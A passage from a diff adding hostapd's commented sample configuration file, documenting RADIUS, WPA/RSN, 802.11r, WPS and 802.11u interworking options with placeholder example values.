VLAN, then its AP_VLAN interface will be 2185+# added to the bridge given by the "bridge" configuration option (see above). 2186+# Otherwise, it will be added to the per-VLAN bridge. 2187+# 0 = disabled (default) 2188+# 1 = enabled 2189+#per_sta_vif=0 2190+ 2191+# VLAN interface list for dynamic VLAN mode is read from a separate text file. 2192+# This list is used to map VLAN ID from the RADIUS server to a network 2193+# interface. Each station is bound to one interface in the same way as with 2194+# multiple BSSIDs or SSIDs. 
Each line in this text file is defining a new 2195+# interface and the line must include VLAN ID and interface name separated by 2196+# white space (space or tab). 2197+# If no entries are provided by this file, the station is statically mapped 2198+# to <bss-iface>.<vlan-id> interfaces. 2199+#vlan_file=/etc/hostapd.vlan 2200+ 2201+# Interface where 802.1q tagged packets should appear when a RADIUS server is 2202+# used to determine which VLAN a station is on. hostapd creates a bridge for 2203+# each VLAN. Then hostapd adds a VLAN interface (associated with the interface 2204+# indicated by 'vlan_tagged_interface') and the appropriate wireless interface 2205+# to the bridge. 2206+#vlan_tagged_interface=eth0 2207+ 2208+# Bridge (prefix) to add the wifi and the tagged interface to. This gets the 2209+# VLAN ID appended. It defaults to brvlan%d if no tagged interface is given 2210+# and br%s.%d if a tagged interface is given, provided %s = tagged interface 2211+# and %d = VLAN ID. 2212+#vlan_bridge=brvlan 2213+ 2214+# When hostapd creates a VLAN interface on vlan_tagged_interfaces, it needs 2215+# to know how to name it. 2216+# 0 = vlan<XXX>, e.g., vlan1 2217+# 1 = <vlan_tagged_interface>.<XXX>, e.g. eth0.1 2218+#vlan_naming=0 2219+ 2220+# Arbitrary RADIUS attributes can be added into Access-Request and 2221+# Accounting-Request packets by specifying the contents of the attributes with 2222+# the following configuration parameters. There can be multiple of these to 2223+# add multiple attributes. These parameters can also be used to override some 2224+# of the attributes added automatically by hostapd. 2225+# Format: <attr_id>[:<syntax:value>] 2226+# attr_id: RADIUS attribute type (e.g., 26 = Vendor-Specific) 2227+# syntax: s = string (UTF-8), d = integer, x = octet string 2228+# value: attribute value in format indicated by the syntax 2229+# If syntax and value parts are omitted, a null value (single 0x00 octet) is 2230+# used. 
2231+# 2232+# Additional Access-Request attributes 2233+# radius_auth_req_attr=<attr_id>[:<syntax:value>] 2234+# Examples: 2235+# Operator-Name = "Operator" 2236+#radius_auth_req_attr=126:s:Operator 2237+# Service-Type = Framed (2) 2238+#radius_auth_req_attr=6:d:2 2239+# Connect-Info = "testing" (this overrides the automatically generated value) 2240+#radius_auth_req_attr=77:s:testing 2241+# Same Connect-Info value set as a hexdump 2242+#radius_auth_req_attr=77:x:74657374696e67 2243+ 2244+# 2245+# Additional Accounting-Request attributes 2246+# radius_acct_req_attr=<attr_id>[:<syntax:value>] 2247+# Examples: 2248+# Operator-Name = "Operator" 2249+#radius_acct_req_attr=126:s:Operator 2250+ 2251+# Dynamic Authorization Extensions (RFC 5176) 2252+# This mechanism can be used to allow dynamic changes to user session based on 2253+# commands from a RADIUS server (or some other disconnect client that has the 2254+# needed session information). For example, Disconnect message can be used to 2255+# request an associated station to be disconnected. 2256+# 2257+# This is disabled by default. Set radius_das_port to non-zero UDP port 2258+# number to enable. 2259+#radius_das_port=3799 2260+# 2261+# DAS client (the host that can send Disconnect/CoA requests) and shared secret 2262+#radius_das_client=192.168.1.123 shared secret here 2263+# 2264+# DAS Event-Timestamp time window in seconds 2265+#radius_das_time_window=300 2266+# 2267+# DAS require Event-Timestamp 2268+#radius_das_require_event_timestamp=1 2269+# 2270+# DAS require Message-Authenticator 2271+#radius_das_require_message_authenticator=1 2272+ 2273+##### RADIUS authentication server configuration ############################## 2274+ 2275+# hostapd can be used as a RADIUS authentication server for other hosts. This 2276+# requires that the integrated EAP server is also enabled and both 2277+# authentication services are sharing the same configuration. 
2278+ 2279+# File name of the RADIUS clients configuration for the RADIUS server. If this 2280+# commented out, RADIUS server is disabled. 2281+#radius_server_clients=/etc/hostapd.radius_clients 2282+ 2283+# The UDP port number for the RADIUS authentication server 2284+#radius_server_auth_port=1812 2285+ 2286+# The UDP port number for the RADIUS accounting server 2287+# Commenting this out or setting this to 0 can be used to disable RADIUS 2288+# accounting while still enabling RADIUS authentication. 2289+#radius_server_acct_port=1813 2290+ 2291+# Use IPv6 with RADIUS server (IPv4 will also be supported using IPv6 API) 2292+#radius_server_ipv6=1 2293+ 2294+ 2295+##### WPA/IEEE 802.11i configuration ########################################## 2296+ 2297+# Enable WPA. Setting this variable configures the AP to require WPA (either 2298+# WPA-PSK or WPA-RADIUS/EAP based on other configuration). For WPA-PSK, either 2299+# wpa_psk or wpa_passphrase must be set and wpa_key_mgmt must include WPA-PSK. 2300+# Instead of wpa_psk / wpa_passphrase, wpa_psk_radius might suffice. 2301+# For WPA-RADIUS/EAP, ieee8021x must be set (but without dynamic WEP keys), 2302+# RADIUS authentication server must be configured, and WPA-EAP must be included 2303+# in wpa_key_mgmt. 2304+# This field is a bit field that can be used to enable WPA (IEEE 802.11i/D3.0) 2305+# and/or WPA2 (full IEEE 802.11i/RSN): 2306+# bit0 = WPA 2307+# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled) 2308+#wpa=1 2309+ 2310+# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit 2311+# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase 2312+# (8..63 characters) that will be converted to PSK. This conversion uses SSID 2313+# so the PSK changes when ASCII passphrase is used and the SSID is changed. 
2314+# wpa_psk (dot11RSNAConfigPSKValue)
2315+# wpa_passphrase (dot11RSNAConfigPSKPassPhrase)
2316+#wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
2317+#wpa_passphrase=secret passphrase
2318+
2319+# Optionally, WPA PSKs can be read from a separate text file (containing list
2320+# of (PSK,MAC address) pairs. This allows more than one PSK to be configured.
2321+# Use absolute path name to make sure that the files can be read on SIGHUP
2322+# configuration reloads.
2323+#wpa_psk_file=/etc/hostapd.wpa_psk
2324+
2325+# Optionally, WPA passphrase can be received from RADIUS authentication server
2326+# This requires macaddr_acl to be set to 2 (RADIUS)
2327+# 0 = disabled (default)
2328+# 1 = optional; use default passphrase/psk if RADIUS server does not include
2329+# Tunnel-Password
2330+# 2 = required; reject authentication if RADIUS server does not include
2331+# Tunnel-Password
2332+#wpa_psk_radius=0
2333+
2334+# Set of accepted key management algorithms (WPA-PSK, WPA-EAP, or both). The
2335+# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
2336+# added to enable SHA256-based stronger algorithms.
2337+# (dot11RSNAConfigAuthenticationSuitesTable)
2338+#wpa_key_mgmt=WPA-PSK WPA-EAP
2339+
2340+# Set of accepted cipher suites (encryption algorithms) for pairwise keys
2341+# (unicast packets). This is a space separated list of algorithms:
2342+# CCMP = AES in Counter mode with CBC-MAC [RFC 3610, IEEE 802.11i/D7.0]
2343+# TKIP = Temporal Key Integrity Protocol [IEEE 802.11i/D7.0]
2344+# Group cipher suite (encryption algorithm for broadcast and multicast frames)
2345+# is automatically selected based on this configuration. If only CCMP is
2346+# allowed as the pairwise cipher, group cipher will also be CCMP. Otherwise,
2347+# TKIP will be used as the group cipher.
2348+# (dot11RSNAConfigPairwiseCiphersTable)
2349+# Pairwise cipher for WPA (v1) (default: TKIP)
2350+#wpa_pairwise=TKIP CCMP
2351+# Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value)
2352+#rsn_pairwise=CCMP
2353+
2354+# Time interval for rekeying GTK (broadcast/multicast encryption keys) in
2355+# seconds. (dot11RSNAConfigGroupRekeyTime)
2356+#wpa_group_rekey=600
2357+
2358+# Rekey GTK when any STA that possesses the current GTK is leaving the BSS.
2359+# (dot11RSNAConfigGroupRekeyStrict)
2360+#wpa_strict_rekey=1
2361+
2362+# Time interval for rekeying GMK (master key used internally to generate GTKs
2363+# (in seconds).
2364+#wpa_gmk_rekey=86400
2365+
2366+# Maximum lifetime for PTK in seconds. This can be used to enforce rekeying of
2367+# PTK to mitigate some attacks against TKIP deficiencies.
2368+#wpa_ptk_rekey=600
2369+
2370+# Enable IEEE 802.11i/RSN/WPA2 pre-authentication. This is used to speed up
2371+# roaming be pre-authenticating IEEE 802.1X/EAP part of the full RSN
2372+# authentication and key handshake before actually associating with a new AP.
2373+# (dot11RSNAPreauthenticationEnabled)
2374+#rsn_preauth=1
2375+#
2376+# Space separated list of interfaces from which pre-authentication frames are
2377+# accepted (e.g., 'eth0' or 'eth0 wlan0wds0'. This list should include all
2378+# interface that are used for connections to other APs. This could include
2379+# wired interfaces and WDS links. The normal wireless data interface towards
2380+# associated stations (e.g., wlan0) should not be added, since
2381+# pre-authentication is only used with APs other than the currently associated
2382+# one.
2383+#rsn_preauth_interfaces=eth0
2384+
2385+# peerkey: Whether PeerKey negotiation for direct links (IEEE 802.11e) is
2386+# allowed. This is only used with RSN/WPA2.
2387+# 0 = disabled (default)
2388+# 1 = enabled
2389+#peerkey=1
2390+
2391+# ieee80211w: Whether management frame protection (MFP) is enabled
2392+# 0 = disabled (default)
2393+# 1 = optional
2394+# 2 = required
2395+#ieee80211w=0
2396+
2397+# Group management cipher suite
2398+# Default: AES-128-CMAC (BIP)
2399+# Other options (depending on driver support):
2400+# BIP-GMAC-128
2401+# BIP-GMAC-256
2402+# BIP-CMAC-256
2403+# Note: All the stations connecting to the BSS will also need to support the
2404+# selected cipher. The default AES-128-CMAC is the only option that is commonly
2405+# available in deployed devices.
2406+#group_mgmt_cipher=AES-128-CMAC
2407+
2408+# Association SA Query maximum timeout (in TU = 1.024 ms; for MFP)
2409+# (maximum time to wait for a SA Query response)
2410+# dot11AssociationSAQueryMaximumTimeout, 1...4294967295
2411+#assoc_sa_query_max_timeout=1000
2412+
2413+# Association SA Query retry timeout (in TU = 1.024 ms; for MFP)
2414+# (time between two subsequent SA Query requests)
2415+# dot11AssociationSAQueryRetryTimeout, 1...4294967295
2416+#assoc_sa_query_retry_timeout=201
2417+
2418+# disable_pmksa_caching: Disable PMKSA caching
2419+# This parameter can be used to disable caching of PMKSA created through EAP
2420+# authentication. RSN preauthentication may still end up using PMKSA caching if
2421+# it is enabled (rsn_preauth=1).
2422+# 0 = PMKSA caching enabled (default)
2423+# 1 = PMKSA caching disabled
2424+#disable_pmksa_caching=0
2425+
2426+# okc: Opportunistic Key Caching (aka Proactive Key Caching)
2427+# Allow PMK cache to be shared opportunistically among configured interfaces
2428+# and BSSes (i.e., all configurations within a single hostapd process).
2429+# 0 = disabled (default)
2430+# 1 = enabled
2431+#okc=1
2432+
2433+# SAE threshold for anti-clogging mechanism (dot11RSNASAEAntiCloggingThreshold)
2434+# This parameter defines how many open SAE instances can be in progress at the
2435+# same time before the anti-clogging mechanism is taken into use.
2436+#sae_anti_clogging_threshold=5
2437+
2438+# Enabled SAE finite cyclic groups
2439+# SAE implementation are required to support group 19 (ECC group defined over a
2440+# 256-bit prime order field). All groups that are supported by the
2441+# implementation are enabled by default. This configuration parameter can be
2442+# used to specify a limited set of allowed groups. The group values are listed
2443+# in the IANA registry:
2444+# http://www.iana.org/assignments/ipsec-registry/ipsec-registry.xml#ipsec-registry-9
2445+#sae_groups=19 20 21 25 26
2446+
2447+##### IEEE 802.11r configuration ##############################################
2448+
2449+# Mobility Domain identifier (dot11FTMobilityDomainID, MDID)
2450+# MDID is used to indicate a group of APs (within an ESS, i.e., sharing the
2451+# same SSID) between which a STA can use Fast BSS Transition.
2452+# 2-octet identifier as a hex string.
2453+#mobility_domain=a1b2
2454+
2455+# PMK-R0 Key Holder identifier (dot11FTR0KeyHolderID)
2456+# 1 to 48 octet identifier.
2457+# This is configured with nas_identifier (see RADIUS client section above).
2458+
2459+# Default lifetime of the PMK-RO in minutes; range 1..65535
2460+# (dot11FTR0KeyLifetime)
2461+#r0_key_lifetime=10000
2462+
2463+# PMK-R1 Key Holder identifier (dot11FTR1KeyHolderID)
2464+# 6-octet identifier as a hex string.
2465+# Defaults to BSSID.
2466+#r1_key_holder=000102030405
2467+
2468+# Reassociation deadline in time units (TUs / 1.024 ms; range 1000..65535)
2469+# (dot11FTReassociationDeadline)
2470+#reassociation_deadline=1000
2471+
2472+# List of R0KHs in the same Mobility Domain
2473+# format: <MAC address> <NAS Identifier> <128-bit key as hex string>
2474+# This list is used to map R0KH-ID (NAS Identifier) to a destination MAC
2475+# address when requesting PMK-R1 key from the R0KH that the STA used during the
2476+# Initial Mobility Domain Association.
2477+#r0kh=02:01:02:03:04:05 r0kh-1.example.com 000102030405060708090a0b0c0d0e0f
2478+#r0kh=02:01:02:03:04:06 r0kh-2.example.com 00112233445566778899aabbccddeeff
2479+# And so on.. One line per R0KH.
2480+
2481+# List of R1KHs in the same Mobility Domain
2482+# format: <MAC address> <R1KH-ID> <128-bit key as hex string>
2483+# This list is used to map R1KH-ID to a destination MAC address when sending
2484+# PMK-R1 key from the R0KH. This is also the list of authorized R1KHs in the MD
2485+# that can request PMK-R1 keys.
2486+#r1kh=02:01:02:03:04:05 02:11:22:33:44:55 000102030405060708090a0b0c0d0e0f
2487+#r1kh=02:01:02:03:04:06 02:11:22:33:44:66 00112233445566778899aabbccddeeff
2488+# And so on.. One line per R1KH.
2489+
2490+# Whether PMK-R1 push is enabled at R0KH
2491+# 0 = do not push PMK-R1 to all configured R1KHs (default)
2492+# 1 = push PMK-R1 to all configured R1KHs whenever a new PMK-R0 is derived
2493+#pmk_r1_push=1
2494+
2495+# Whether to enable FT-over-DS
2496+# 0 = FT-over-DS disabled
2497+# 1 = FT-over-DS enabled (default)
2498+#ft_over_ds=1
2499+
2500+##### Neighbor table ##########################################################
2501+# Maximum number of entries kept in AP table (either for neigbor table or for
2502+# detecting Overlapping Legacy BSS Condition). The oldest entry will be
2503+# removed when adding a new entry that would make the list grow over this
2504+# limit. Note!
WFA certification for IEEE 802.11g requires that OLBC is
2505+# enabled, so this field should not be set to 0 when using IEEE 802.11g.
2506+# default: 255
2507+#ap_table_max_size=255
2508+
2509+# Number of seconds of no frames received after which entries may be deleted
2510+# from the AP table. Since passive scanning is not usually performed frequently
2511+# this should not be set to very small value. In addition, there is no
2512+# guarantee that every scan cycle will receive beacon frames from the
2513+# neighboring APs.
2514+# default: 60
2515+#ap_table_expiration_time=3600
2516+
2517+# Maximum number of stations to track on the operating channel
2518+# This can be used to detect dualband capable stations before they have
2519+# associated, e.g., to provide guidance on which colocated BSS to use.
2520+# Default: 0 (disabled)
2521+#track_sta_max_num=100
2522+
2523+# Maximum age of a station tracking entry in seconds
2524+# Default: 180
2525+#track_sta_max_age=180
2526+
2527+# Do not reply to group-addressed Probe Request from a station that was seen on
2528+# another radio.
2529+# Default: Disabled
2530+#
2531+# This can be used with enabled track_sta_max_num configuration on another
2532+# interface controlled by the same hostapd process to restrict Probe Request
2533+# frame handling from replying to group-addressed Probe Request frames from a
2534+# station that has been detected to be capable of operating on another band,
2535+# e.g., to try to reduce likelihood of the station selecting a 2.4 GHz BSS when
2536+# the AP operates both a 2.4 GHz and 5 GHz BSS concurrently.
2537+#
2538+# Note: Enabling this can cause connectivity issues and increase latency for
2539+# discovering the AP.
2540+#no_probe_resp_if_seen_on=wlan1
2541+
2542+# Reject authentication from a station that was seen on another radio.
2543+# Default: Disabled
2544+#
2545+# This can be used with enabled track_sta_max_num configuration on another
2546+# interface controlled by the same hostapd process to reject authentication
2547+# attempts from a station that has been detected to be capable of operating on
2548+# another band, e.g., to try to reduce likelihood of the station selecting a
2549+# 2.4 GHz BSS when the AP operates both a 2.4 GHz and 5 GHz BSS concurrently.
2550+#
2551+# Note: Enabling this can cause connectivity issues and increase latency for
2552+# connecting with the AP.
2553+#no_auth_if_seen_on=wlan1
2554+
2555+##### Wi-Fi Protected Setup (WPS) #############################################
2556+
2557+# WPS state
2558+# 0 = WPS disabled (default)
2559+# 1 = WPS enabled, not configured
2560+# 2 = WPS enabled, configured
2561+#wps_state=2
2562+
2563+# Whether to manage this interface independently from other WPS interfaces
2564+# By default, a single hostapd process applies WPS operations to all configured
2565+# interfaces. This parameter can be used to disable that behavior for a subset
2566+# of interfaces. If this is set to non-zero for an interface, WPS commands
2567+# issued on that interface do not apply to other interfaces and WPS operations
2568+# performed on other interfaces do not affect this interface.
2569+#wps_independent=0
2570+
2571+# AP can be configured into a locked state where new WPS Registrar are not
2572+# accepted, but previously authorized Registrars (including the internal one)
2573+# can continue to add new Enrollees.
2574+#ap_setup_locked=1
2575+
2576+# Universally Unique IDentifier (UUID; see RFC 4122) of the device
2577+# This value is used as the UUID for the internal WPS Registrar. If the AP
2578+# is also using UPnP, this value should be set to the device's UPnP UUID.
2579+# If not configured, UUID will be generated based on the local MAC address.
2580+#uuid=12345678-9abc-def0-1234-56789abcdef0
2581+
2582+# Note: If wpa_psk_file is set, WPS is used to generate random, per-device PSKs
2583+# that will be appended to the wpa_psk_file. If wpa_psk_file is not set, the
2584+# default PSK (wpa_psk/wpa_passphrase) will be delivered to Enrollees. Use of
2585+# per-device PSKs is recommended as the more secure option (i.e., make sure to
2586+# set wpa_psk_file when using WPS with WPA-PSK).
2587+
2588+# When an Enrollee requests access to the network with PIN method, the Enrollee
2589+# PIN will need to be entered for the Registrar. PIN request notifications are
2590+# sent to hostapd ctrl_iface monitor. In addition, they can be written to a
2591+# text file that could be used, e.g., to populate the AP administration UI with
2592+# pending PIN requests. If the following variable is set, the PIN requests will
2593+# be written to the configured file.
2594+#wps_pin_requests=/var/run/hostapd_wps_pin_requests
2595+
2596+# Device Name
2597+# User-friendly description of device; up to 32 octets encoded in UTF-8
2598+#device_name=Wireless AP
2599+
2600+# Manufacturer
2601+# The manufacturer of the device (up to 64 ASCII characters)
2602+#manufacturer=Company
2603+
2604+# Model Name
2605+# Model of the device (up to 32 ASCII characters)
2606+#model_name=WAP
2607+
2608+# Model Number
2609+# Additional device description (up to 32 ASCII characters)
2610+#model_number=123
2611+
2612+# Serial Number
2613+# Serial number of the device (up to 32 characters)
2614+#serial_number=12345
2615+
2616+# Primary Device Type
2617+# Used format: <categ>-<OUI>-<subcateg>
2618+# categ = Category as an integer value
2619+# OUI = OUI and type octet as a 4-octet hex-encoded value; 0050F204 for
2620+# default WPS OUI
2621+# subcateg = OUI-specific Sub Category as an integer value
2622+# Examples:
2623+# 1-0050F204-1 (Computer / PC)
2624+# 1-0050F204-2 (Computer / Server)
2625+# 5-0050F204-1 (Storage / NAS)
2626+# 6-0050F204-1 (Network
Infrastructure / AP)
2627+#device_type=6-0050F204-1
2628+
2629+# OS Version
2630+# 4-octet operating system version number (hex string)
2631+#os_version=01020300
2632+
2633+# Config Methods
2634+# List of the supported configuration methods
2635+# Available methods: usba ethernet label display ext_nfc_token int_nfc_token
2636+# nfc_interface push_button keypad virtual_display physical_display
2637+# virtual_push_button physical_push_button
2638+#config_methods=label virtual_display virtual_push_button keypad
2639+
2640+# WPS capability discovery workaround for PBC with Windows 7
2641+# Windows 7 uses incorrect way of figuring out AP's WPS capabilities by acting
2642+# as a Registrar and using M1 from the AP. The config methods attribute in that
2643+# message is supposed to indicate only the configuration method supported by
2644+# the AP in Enrollee role, i.e., to add an external Registrar. For that case,
2645+# PBC shall not be used and as such, the PushButton config method is removed
2646+# from M1 by default. If pbc_in_m1=1 is included in the configuration file,
2647+# the PushButton config method is left in M1 (if included in config_methods
2648+# parameter) to allow Windows 7 to use PBC instead of PIN (e.g., from a label
2649+# in the AP).
2650+#pbc_in_m1=1
2651+
2652+# Static access point PIN for initial configuration and adding Registrars
2653+# If not set, hostapd will not allow external WPS Registrars to control the
2654+# access point. The AP PIN can also be set at runtime with hostapd_cli
2655+# wps_ap_pin command. Use of temporary (enabled by user action) and random
2656+# AP PIN is much more secure than configuring a static AP PIN here. As such,
2657+# use of the ap_pin parameter is not recommended if the AP device has means for
2658+# displaying a random PIN.
2659+#ap_pin=12345670
2660+
2661+# Skip building of automatic WPS credential
2662+# This can be used to allow the automatically generated Credential attribute to
2663+# be replaced with pre-configured Credential(s).
2664+#skip_cred_build=1
2665+
2666+# Additional Credential attribute(s)
2667+# This option can be used to add pre-configured Credential attributes into M8
2668+# message when acting as a Registrar. If skip_cred_build=1, this data will also
2669+# be able to override the Credential attribute that would have otherwise been
2670+# automatically generated based on network configuration. This configuration
2671+# option points to an external file that much contain the WPS Credential
2672+# attribute(s) as binary data.
2673+#extra_cred=hostapd.cred
2674+
2675+# Credential processing
2676+# 0 = process received credentials internally (default)
2677+# 1 = do not process received credentials; just pass them over ctrl_iface to
2678+# external program(s)
2679+# 2 = process received credentials internally and pass them over ctrl_iface
2680+# to external program(s)
2681+# Note: With wps_cred_processing=1, skip_cred_build should be set to 1 and
2682+# extra_cred be used to provide the Credential data for Enrollees.
2683+#
2684+# wps_cred_processing=1 will disabled automatic updates of hostapd.conf file
2685+# both for Credential processing and for marking AP Setup Locked based on
2686+# validation failures of AP PIN. An external program is responsible on updating
2687+# the configuration appropriately in this case.
2688+#wps_cred_processing=0
2689+
2690+# AP Settings Attributes for M7
2691+# By default, hostapd generates the AP Settings Attributes for M7 based on the
2692+# current configuration. It is possible to override this by providing a file
2693+# with pre-configured attributes. This is similar to extra_cred file format,
2694+# but the AP Settings attributes are not encapsulated in a Credential
2695+# attribute.
2696+#ap_settings=hostapd.ap_settings
2697+
2698+# WPS UPnP interface
2699+# If set, support for external Registrars is enabled.
2700+#upnp_iface=br0
2701+
2702+# Friendly Name (required for UPnP)
2703+# Short description for end use. Should be less than 64 characters.
2704+#friendly_name=WPS Access Point
2705+
2706+# Manufacturer URL (optional for UPnP)
2707+#manufacturer_url=http://www.example.com/
2708+
2709+# Model Description (recommended for UPnP)
2710+# Long description for end user. Should be less than 128 characters.
2711+#model_description=Wireless Access Point
2712+
2713+# Model URL (optional for UPnP)
2714+#model_url=http://www.example.com/model/
2715+
2716+# Universal Product Code (optional for UPnP)
2717+# 12-digit, all-numeric code that identifies the consumer package.
2718+#upc=123456789012
2719+
2720+# WPS RF Bands (a = 5G, b = 2.4G, g = 2.4G, ag = dual band, ad = 60 GHz)
2721+# This value should be set according to RF band(s) supported by the AP if
2722+# hw_mode is not set. For dual band dual concurrent devices, this needs to be
2723+# set to ag to allow both RF bands to be advertized.
2724+#wps_rf_bands=ag
2725+
2726+# NFC password token for WPS
2727+# These parameters can be used to configure a fixed NFC password token for the
2728+# AP. This can be generated, e.g., with nfc_pw_token from wpa_supplicant. When
2729+# these parameters are used, the AP is assumed to be deployed with a NFC tag
2730+# that includes the matching NFC password token (e.g., written based on the
2731+# NDEF record from nfc_pw_token).
2732+#
2733+#wps_nfc_dev_pw_id: Device Password ID (16..65535)
2734+#wps_nfc_dh_pubkey: Hexdump of DH Public Key
2735+#wps_nfc_dh_privkey: Hexdump of DH Private Key
2736+#wps_nfc_dev_pw: Hexdump of Device Password
2737+
2738+##### Wi-Fi Direct (P2P) ######################################################
2739+
2740+# Enable P2P Device management
2741+#manage_p2p=1
2742+
2743+# Allow cross connection
2744+#allow_cross_connection=1
2745+
2746+#### TDLS (IEEE 802.11z-2010) #################################################
2747+
2748+# Prohibit use of TDLS in this BSS
2749+#tdls_prohibit=1
2750+
2751+# Prohibit use of TDLS Channel Switching in this BSS
2752+#tdls_prohibit_chan_switch=1
2753+
2754+##### IEEE 802.11v-2011 #######################################################
2755+
2756+# Time advertisement
2757+# 0 = disabled (default)
2758+# 2 = UTC time at which the TSF timer is 0
2759+#time_advertisement=2
2760+
2761+# Local time zone as specified in 8.3 of IEEE Std 1003.1-2004:
2762+# stdoffset[dst[offset][,start[/time],end[/time]]]
2763+#time_zone=EST5
2764+
2765+# WNM-Sleep Mode (extended sleep mode for stations)
2766+# 0 = disabled (default)
2767+# 1 = enabled (allow stations to use WNM-Sleep Mode)
2768+#wnm_sleep_mode=1
2769+
2770+# BSS Transition Management
2771+# 0 = disabled (default)
2772+# 1 = enabled
2773+#bss_transition=1
2774+
2775+# Proxy ARP
2776+# 0 = disabled (default)
2777+# 1 = enabled
2778+#proxy_arp=1
2779+
2780+# IPv6 Neighbor Advertisement multicast-to-unicast conversion
2781+# This can be used with Proxy ARP to allow multicast NAs to be forwarded to
2782+# associated STAs using link layer unicast delivery.
2783+# 0 = disabled (default)
2784+# 1 = enabled
2785+#na_mcast_to_ucast=0
2786+
2787+##### IEEE 802.11u-2011 #######################################################
2788+
2789+# Enable Interworking service
2790+#interworking=1
2791+
2792+# Access Network Type
2793+# 0 = Private network
2794+# 1 = Private network with guest access
2795+# 2 = Chargeable public network
2796+# 3 = Free public network
2797+# 4 = Personal device network
2798+# 5 = Emergency services only network
2799+# 14 = Test or experimental
2800+# 15 = Wildcard
2801+#access_network_type=0
2802+
2803+# Whether the network provides connectivity to the Internet
2804+# 0 = Unspecified
2805+# 1 = Network provides connectivity to the Internet
2806+#internet=1
2807+
2808+# Additional Step Required for Access
2809+# Note: This is only used with open network, i.e., ASRA shall ne set to 0 if
2810+# RSN is used.
2811+#asra=0
2812+
2813+# Emergency services reachable
2814+#esr=0
2815+
2816+# Unauthenticated emergency service accessible
2817+#uesa=0
2818+
2819+# Venue Info (optional)
2820+# The available values are defined in IEEE Std 802.11u-2011, 7.3.1.34.
2821+# Example values (group,type):
2822+# 0,0 = Unspecified
2823+# 1,7 = Convention Center
2824+# 1,13 = Coffee Shop
2825+# 2,0 = Unspecified Business
2826+# 7,1 Private Residence
2827+#venue_group=7
2828+#venue_type=1
2829+
2830+# Homogeneous ESS identifier (optional; dot11HESSID)
2831+# If set, this shall be identifical to one of the BSSIDs in the homogeneous
2832+# ESS and this shall be set to the same value across all BSSs in homogeneous
2833+# ESS.
2834+#hessid=02:03:04:05:06:07
2835+
2836+# Roaming Consortium List
2837+# Arbitrary number of Roaming Consortium OIs can be configured with each line
2838+# adding a new OI to the list. The first three entries are available through
2839+# Beacon and Probe Response frames. Any additional entry will be available only
2840+# through ANQP queries.
Each OI is between 3 and 15 octets and is configured as
2841+# a hexstring.
2842+#roaming_consortium=021122
2843+#roaming_consortium=2233445566
2844+
2845+# Venue Name information
2846+# This parameter can be used to configure one or more Venue Name Duples for
2847+# Venue Name ANQP information. Each entry has a two or three character language
2848+# code (ISO-639) separated by colon from the venue name string.
2849+# Note that venue_group and venue_type have to be set for Venue Name
2850+# information to be complete.
2851+#venue_name=eng:Example venue
2852+#venue_name=fin:Esimerkkipaikka
2853+# Alternative format for language:value strings:
2854+# (double quoted string, printf-escaped string)
2855+#venue_name=P"eng:Example\nvenue"
2856+
2857+# Network Authentication Type
2858+# This parameter indicates what type of network authentication is used in the
2859+# network.
2860+# format: <network auth type indicator (1-octet hex str)> [redirect URL]
2861+# Network Authentication Type Indicator values:
2862+# 00 = Acceptance of terms and conditions
2863+# 01 = On-line enrollment supported
2864+# 02 = http/https redirection
2865+# 03 = DNS redirection
2866+#network_auth_type=00
2867+#network_auth_type=02http://www.example.com/redirect/me/here/
2868+
2869+# IP Address Type Availability
2870+# format: <1-octet encoded value as hex str>
2871+# (ipv4_type & 0x3f) << 2 | (ipv6_type & 0x3)
2872+# ipv4_type:
2873+# 0 = Address type not available
2874+# 1 = Public IPv4 address available
2875+# 2 = Port-restricted IPv4 address available
2876+# 3 = Single NATed private IPv4 address available
2877+# 4 = Double NATed private IPv4 address available
2878+# 5 = Port-restricted IPv4 address and single NATed IPv4 address available
2879+# 6 = Port-restricted IPv4 address and double NATed IPv4 address available
2880+# 7 = Availability of the address type is not known
2881+# ipv6_type:
2882+# 0 = Address type not available
2883+# 1 = Address type available
2884+# 2 = Availability of the
address type not known
2885+#ipaddr_type_availability=14
2886+
2887+# Domain Name
2888+# format: <variable-octet str>[,<variable-octet str>]
2889+#domain_name=example.com,another.example.com,yet-another.example.com
2890+
2891+# 3GPP Cellular Network information
2892+# format: <MCC1,MNC1>[;<MCC2,MNC2>][;...]
2893+#anqp_3gpp_cell_net=244,91;310,026;234,56
2894+
2895+# NAI Realm information
2896+# One or more realm can be advertised. Each nai_realm line adds a new realm to
2897+# the set. These parameters provide information for stations using Interworking
2898+# network selection to allow automatic connection to a network based on
2899+# credentials.
2900+# format: <encoding>,<NAI Realm(s)>[,<EAP Method 1>][,<EAP Method 2>][,...]
2901+# encoding:
2902+# 0 = Realm formatted in accordance with IETF RFC 4282
2903+# 1 = UTF-8 formatted character string that is not formatted in
2904+# accordance with IETF RFC 4282
2905+# NAI Realm(s): Semi-colon delimited NAI Realm(s)
2906+# EAP Method: <EAP Method>[:<[AuthParam1:Val1]>][<[AuthParam2:Val2]>][...]
2907+# EAP Method types, see:
2908+# http://www.iana.org/assignments/eap-numbers/eap-numbers.xhtml#eap-numbers-4
2909+# AuthParam (Table 8-188 in IEEE Std 802.11-2012):
2910+# ID 2 = Non-EAP Inner Authentication Type
2911+# 1 = PAP, 2 = CHAP, 3 = MSCHAP, 4 = MSCHAPV2
2912+# ID 3 = Inner authentication EAP Method Type
2913+# ID 5 = Credential Type
2914+# 1 = SIM, 2 = USIM, 3 = NFC Secure Element, 4 = Hardware Token,
2915+# 5 = Softoken, 6 = Certificate, 7 = username/password, 9 = Anonymous,
2916+# 10 = Vendor Specific
2917+#nai_realm=0,example.com;example.net
2918+# EAP methods EAP-TLS with certificate and EAP-TTLS/MSCHAPv2 with
2919+# username/password
2920+#nai_realm=0,example.org,13[5:6],21[2:4][5:7]
2921+
2922+# Arbitrary ANQP-element configuration
2923+# Additional ANQP-elements with arbitrary values can be defined by specifying
2924+# their contents in raw format as a hexdump of the payload.
Note that these
2925+# values will override ANQP-element contents that may have been specified in the
2926+# more higher layer configuration parameters listed above.
2927+# format: anqp_elem=<InfoID>:<hexdump of payload>
2928+# For example, AP Geospatial Location ANQP-element with unknown location:
2929+#anqp_elem=265:0000
2930+# For example, AP Civic Location ANQP-element with unknown location:
2931+#anqp_elem=266:000000
2932+
2933+# GAS Address 3 behavior
